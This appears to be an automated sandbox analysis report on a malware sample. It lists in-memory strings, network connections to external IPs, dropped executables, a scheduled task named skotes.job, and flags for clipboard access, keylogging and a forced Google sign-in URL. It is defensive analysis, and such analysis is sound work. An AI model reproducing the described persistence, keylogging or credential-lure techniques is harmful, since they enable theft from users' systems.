Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000003.2784445525.000002EE65121000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE60498000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F5BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2785303389.000002EE64AC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE651FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000002.2908285442.000002EE5F431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5EC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65132000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001A.00000002.2908285442.000002EE5F431000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/P4
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6007C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE60498000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F5BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C911000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2913537647.000002EE600B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F50E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2847919558.000002EE4C790000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2747136565.000002EE67138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58ED5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2666087846.000001302575A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2676161834.000002451296F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001A.00000002.2848249080.000002EE4C95D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd8
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E229000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: d7c50276ff.exe, 0000000C.00000002.2695657922.0000000001178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdQg
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUnsupported
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmaybeOfferTranslatio
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50070 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50103 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50128 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50130 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50131 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 12_2_00FDEAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_00FDED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 12_2_00FDEAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 12_2_00FCAA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_00FF9576

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: d7c50276ff.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a1304f50-6
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_886619fe-a
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .rsrc
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .idata
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .rsrc
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: aae25c676b.exe.5.dr Static PE information: section name:
Source: aae25c676b.exe.5.dr Static PE information: section name: .rsrc
Source: aae25c676b.exe.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .rsrc
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .idata
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD5EB: CreateFileW,DeviceIoControl,CloseHandle, 12_2_00FCD5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00FC1201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 12_2_00FCE8F6
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01013EE2 0_3_01013EE2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00A3DB7F 6_2_00A3DB7F
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3E9B 6_2_00BD3E9B
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3EFB 6_2_00BD3EFB
